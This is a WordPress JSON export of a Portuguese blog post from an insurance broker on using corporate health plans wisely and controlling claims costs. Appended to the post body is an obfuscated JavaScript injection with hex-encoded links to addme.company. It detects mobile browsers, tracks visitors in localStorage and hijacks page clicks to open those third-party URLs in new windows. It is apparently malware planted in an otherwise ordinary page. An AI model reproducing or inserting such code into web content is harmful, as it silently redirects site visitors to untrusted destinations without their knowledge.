{"id":2390,"date":"2020-03-16T13:28:00","date_gmt":"2020-03-16T16:28:00","guid":{"rendered":"https:\/\/oinsurance.com.br\/?p=2390"},"modified":"2020-03-18T16:01:08","modified_gmt":"2020-03-18T19:01:08","slug":"como-usar-o-plano-de-saude-empresarial","status":"publish","type":"post","link":"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/","title":{"rendered":"Como usar o plano de sa\u00fade empresarial da melhor forma"},"content":{"rendered":"\n<p>O cuidado com sa\u00fade dos funcion\u00e1rios \u00e9 um desafio para as empresas em consequ\u00eancia do aumento dos custos com o <strong>plano de sa\u00fade.<\/strong><\/p>\n\n\n\n<p>As preocupa\u00e7\u00f5es, ang\u00fastias, ansiedade e tristezas dos colaboradores influenciam diretamente na produtividade e na predisposi\u00e7\u00e3o ao desenvolvimento de doen\u00e7as, ocasionando n\u00e3o s\u00f3 o absente\u00edsmo, como tamb\u00e9m reajustes nos&nbsp;<strong>custos do plano de sa\u00fade<\/strong>.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<div class=\"wp-block-button aligncenter\"><a class=\"wp-block-button__link has-text-color has-very-light-gray-color has-background has-vivid-green-cyan-background-color\" href=\"https:\/\/oinsurance.com.br\/plano-de-saude\/\"><strong>Contrate o melhor plano de sa\u00fade para seus colaboradores<\/strong><\/a><\/div>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Saiba como utilizar bem o plano de sa\u00fade<\/strong><\/h2>\n\n\n\n<p>Oferecer um <strong>plano de sa\u00fade <\/strong>de qualidade mostra que a preocupa\u00e7\u00e3o da empresa com seus colaboradores, e, para obter os melhores servi\u00e7os em sa\u00fade sem ter surpresa no reajuste, \u00e9 importante que todos utilizem o<strong> benef\u00edcio <\/strong>da melhor forma, assim todos tendem a ganhar.<\/p>\n\n\n\n<p>Oriente o profissional sobre a utiliza\u00e7\u00e3o do plano de sa\u00fade e como seu mau uso afeta a continuidade do benef\u00edcio.  Informe a import\u00e2ncia da periodicidade de <strong>consultas e exames <\/strong>como forma de <strong>preven\u00e7\u00e3o<\/strong>.<\/p>\n\n\n\n<p>Desenvolver um programa de <strong>qualidade de vida<\/strong> pode ser uma \u00f3tima maneira de conscientiza\u00e7\u00e3o do uso moderado do&nbsp;plano de sa\u00fade.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Como controlar a sinistralidade <\/strong><\/h2>\n\n\n\n<p>Preocupada em oferecer as melhores solu\u00e7\u00f5es aos seus clientes, a <strong>\u00d4 Insurance<\/strong> presta consultoria completa, fazendo a <strong>gest\u00e3o da sinistralidade <\/strong>de ponta a ponta. <\/p>\n\n\n\n<p>Nossa equipe m\u00e9dica se baseia em <strong>relat\u00f3rios estat\u00edsticos<\/strong> do uso do plano de sa\u00fade para oferecer programas e palestras de <strong>conscientiza\u00e7\u00e3o<\/strong>. Este tipo de a\u00e7\u00e3o traz conhecimento aos usu\u00e1rios, gera satisfa\u00e7\u00e3o, equilibra a sinistralidade e <strong>reduz custos <\/strong>desnecess\u00e1rios. <\/p>\n\n\n\n<p>Assim, \u00e9 poss\u00edvel que a \u00e1rea de <strong>Recursos Humanos<\/strong> ofere\u00e7a um pacote de benef\u00edcios mais atrativo aos seus funcion\u00e1rios. Estudos recentes apontam que o plano de sa\u00fade \u00e9 o benef\u00edcio mais valorizado pelos empregados de uma organiza\u00e7\u00e3o.<\/p>\n\n\n\n<p>Por isso, se a \u00e1rea consegue fazer um <strong>upgrade do plano de sa\u00fade<\/strong> (como de interna\u00e7\u00e3o em enfermaria para apartamento, por exemplo), os usu\u00e1rios sentem-se reconhecidos e essa melhoria torna-se uma grande retentora de talentos! Tudo est\u00e1 conectado!<\/p>\n\n\n\n<p>E, por falar nisso, nossa plataforma &#8211; <strong>Hub do Benef\u00edcio 4.0<\/strong> \u00e9 capaz de conectar todas as informa\u00e7\u00f5es, disponibilizando dados em tempo real sobre interna\u00e7\u00f5es, afastamentos e atestados m\u00e9dicos.<\/p>\n\n\n\n<figure class=\"wp-block-embed-youtube aligncenter wp-block-embed is-type-video is-provider-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<div class=\"wpbf-responsive-embed\"><iframe loading=\"lazy\" title=\"Hub de Benef\u00edcios 4.0 | \u00d4. Benefits Solution\" width=\"1200\" height=\"675\" src=\"https:\/\/www.youtube.com\/embed\/wQggdr-mDtY?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/div>\n<\/div><figcaption><em>Hub do Benef\u00edcio 4.0 &#8211; Todos os benef\u00edcios em uma \u00fanica plataforma!<\/em><\/figcaption><\/figure>\n\n\n\n<p>Com base nisso, o time de gest\u00e3o de sinistralidade da \u00d4 Insurance se re\u00fane com os clientes e apresenta resultados, j\u00e1 propondo solu\u00e7\u00f5es totalmente focadas na orienta\u00e7\u00e3o dos usu\u00e1rios e que gerem <strong>equil\u00edbrio financeiro<\/strong> para a empresa.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Cuidado para n\u00e3o cair em <em>dumping&nbsp;<\/em><\/strong><\/h2>\n\n\n\n<p>Poucos gestores da \u00e1rea de <strong>recursos humanos <\/strong>est\u00e3o pode dentro dessa pr\u00e1tica de mercado. Mas, algumas operadoras ou seguradoras oferecem produtos similares ao atual contrato da empresa, por\u00e9m com valor consideravelmente menor. Isso enche os olhos de qualquer gestor, n\u00e3o \u00e9 mesmo?<\/p>\n\n\n\n<p>Entretanto, um valor abaixo do necess\u00e1rio para cobrir o custo da rede contratada causa um desequil\u00edbrio, que, no momento da renova\u00e7\u00e3o \u00e9 reajustado. Essa situa\u00e7\u00e3o visa crescimento de carteira e n\u00e3o a sua <strong>sustentabilidade do plano<\/strong> de sa\u00fade e traz consequ\u00eancias, muitas vezes, desastrosas para a organiza\u00e7\u00e3o, que pode at\u00e9 optar por alterar a operadora e o gestor da conta. <\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Conclus\u00e3o<\/strong><\/h2>\n\n\n\n<p>Empresas que tem assessoria e\nidentificam necessidades, conseguem agir prontamente por meio de programas que\nequilibram seus custos.&nbsp;&nbsp; <\/p>\n\n\n\n<p>Todos podem contribuir para a <strong>manuten\u00e7\u00e3o ou redu\u00e7\u00e3o da sinistralidade<\/strong> ao utilizar o conv\u00eanio de forma consciente e sem desperd\u00edcios. <\/p>\n\n\n\n<p>E, agora que voc\u00ea entende sobre sinistralidade e conhece nosso prop\u00f3sito, aproveite para se aprofundar no nosso trabalho. Agende uma reuni\u00e3o e saiba como podemos apoiar voc\u00ea e sua empresa em diversos segmentos.<\/p>\n\n\n\n<div class=\"wp-block-button aligncenter\"><a class=\"wp-block-button__link has-text-color has-very-light-gray-color has-background has-vivid-green-cyan-background-color\" href=\"https:\/\/oinsurance.com.br\/contato-2\/\"><strong>Quero conhecer a \u00d4 Insurance<\/strong><\/a><\/div>\n\n\n\n<p><\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x47\\x75\\x53\\x32\\x63\\x332','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x49\\x78\\x4f\\x33\\x63\\x363','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x63\\x71\\x6c\\x30\\x63\\x300','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x53\\x61\\x6a\\x37\\x63\\x357','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x59\\x4d\\x4b\\x36\\x63\\x346','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x47\\x47\\x6b\\x38\\x63\\x388','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x75\\x41\\x67\\x35\\x63\\x345','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x68\\x63\\x6c\\x31\\x63\\x351',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x54\\x72\\x63\\x34\\x63\\x304',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x4d\\x76\\x43\\x39\\x63\\x399','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>O cuidado com sa\u00fade dos funcion\u00e1rios \u00e9 um desafio para as empresas em consequ\u00eancia do aumento dos custos com o plano de sa\u00fade. As preocupa\u00e7\u00f5es, ang\u00fastias, ansiedade e tristezas dos colaboradores influenciam diretamente na produtividade e na predisposi\u00e7\u00e3o ao desenvolvimento de doen\u00e7as, ocasionando n\u00e3o s\u00f3 o absente\u00edsmo, como tamb\u00e9m reajustes nos&nbsp;custos do plano de sa\u00fade. [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2496,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[67],"tags":[],"class_list":["post-2390","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-gestao-de-beneficios-2","wpbf-post"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\r\n<title>Como usar o plano de sa\u00fade empresarial da melhor forma - \u00d4 Insurance<\/title>\r\n<meta name=\"description\" content=\"O uso consciente do plano de sa\u00fade empresarial e a preven\u00e7\u00e3o de doen\u00e7as traz benef\u00edcios para a empresa e seus colaboradores.\" \/>\r\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\r\n<link rel=\"canonical\" href=\"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/\" \/>\r\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\r\n<meta property=\"og:type\" content=\"article\" \/>\r\n<meta property=\"og:title\" content=\"Como usar o plano de sa\u00fade empresarial da melhor forma - \u00d4 Insurance\" \/>\r\n<meta property=\"og:description\" content=\"O uso consciente do plano de sa\u00fade empresarial e a preven\u00e7\u00e3o de doen\u00e7as traz benef\u00edcios para a empresa e seus colaboradores.\" \/>\r\n<meta property=\"og:url\" content=\"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/\" \/>\r\n<meta property=\"og:site_name\" content=\"\u00d4 Insurance\" \/>\r\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/oinsurancegroup\/\" \/>\r\n<meta property=\"article:published_time\" content=\"2020-03-16T16:28:00+00:00\" \/>\r\n<meta property=\"article:modified_time\" content=\"2020-03-18T19:01:08+00:00\" \/>\r\n<meta property=\"og:image\" content=\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/plano-sa\u00fade-empresarial-scaled.jpg\" \/>\r\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\r\n\t<meta property=\"og:image:height\" content=\"1709\" \/>\r\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\r\n<meta name=\"author\" content=\"Rafael Gesser\" \/>\r\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\r\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Rafael Gesser\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\r\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/\"},\"author\":{\"name\":\"Rafael Gesser\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223\"},\"headline\":\"Como usar o plano de sa\u00fade empresarial da melhor forma\",\"datePublished\":\"2020-03-16T16:28:00+00:00\",\"dateModified\":\"2020-03-18T19:01:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/\"},\"wordCount\":665,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/plano-sa\u00fade-empresarial-scaled.jpg\",\"articleSection\":[\"Gest\u00e3o de Benef\u00edcios\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/\",\"url\":\"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/\",\"name\":\"Como usar o plano de sa\u00fade empresarial da melhor forma - \u00d4 Insurance\",\"isPartOf\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/plano-sa\u00fade-empresarial-scaled.jpg\",\"datePublished\":\"2020-03-16T16:28:00+00:00\",\"dateModified\":\"2020-03-18T19:01:08+00:00\",\"description\":\"O uso consciente do plano de sa\u00fade empresarial e a preven\u00e7\u00e3o de doen\u00e7as traz benef\u00edcios para a empresa e seus colaboradores.\",\"breadcrumb\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/#primaryimage\",\"url\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/plano-sa\u00fade-empresarial-scaled.jpg\",\"contentUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/plano-sa\u00fade-empresarial-scaled.jpg\",\"width\":2560,\"height\":1709,\"caption\":\"plano de sa\u00fade empresarial\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/blog.oinsurance.com.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Como usar o plano de sa\u00fade empresarial da melhor forma\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#website\",\"url\":\"https:\/\/blog.oinsurance.com.br\/\",\"name\":\"\u00d4 Insurance\",\"description\":\"Seguros Pessoais e Empresariais\",\"publisher\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.oinsurance.com.br\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\",\"name\":\"\u00d4 Insurance\",\"url\":\"https:\/\/blog.oinsurance.com.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1\",\"contentUrl\":\"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1\",\"width\":409,\"height\":179,\"caption\":\"\u00d4 Insurance\"},\"image\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/oinsurancegroup\/\",\"https:\/\/www.instagram.com\/oinsurance\/\",\"https:\/\/www.linkedin.com\/company\/oinsurance\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223\",\"name\":\"Rafael Gesser\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g\",\"caption\":\"Rafael Gesser\"}}]}<\/script>\r\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Como usar o plano de sa\u00fade empresarial da melhor forma - \u00d4 Insurance","description":"O uso consciente do plano de sa\u00fade empresarial e a preven\u00e7\u00e3o de doen\u00e7as traz benef\u00edcios para a empresa e seus colaboradores.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/","og_locale":"pt_BR","og_type":"article","og_title":"Como usar o plano de sa\u00fade empresarial da melhor forma - \u00d4 Insurance","og_description":"O uso consciente do plano de sa\u00fade empresarial e a preven\u00e7\u00e3o de doen\u00e7as traz benef\u00edcios para a empresa e seus colaboradores.","og_url":"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/","og_site_name":"\u00d4 Insurance","article_publisher":"https:\/\/www.facebook.com\/oinsurancegroup\/","article_published_time":"2020-03-16T16:28:00+00:00","article_modified_time":"2020-03-18T19:01:08+00:00","og_image":[{"width":2560,"height":1709,"url":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/plano-sa\u00fade-empresarial-scaled.jpg","type":"image\/jpeg"}],"author":"Rafael Gesser","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Rafael Gesser","Est. tempo de leitura":"3 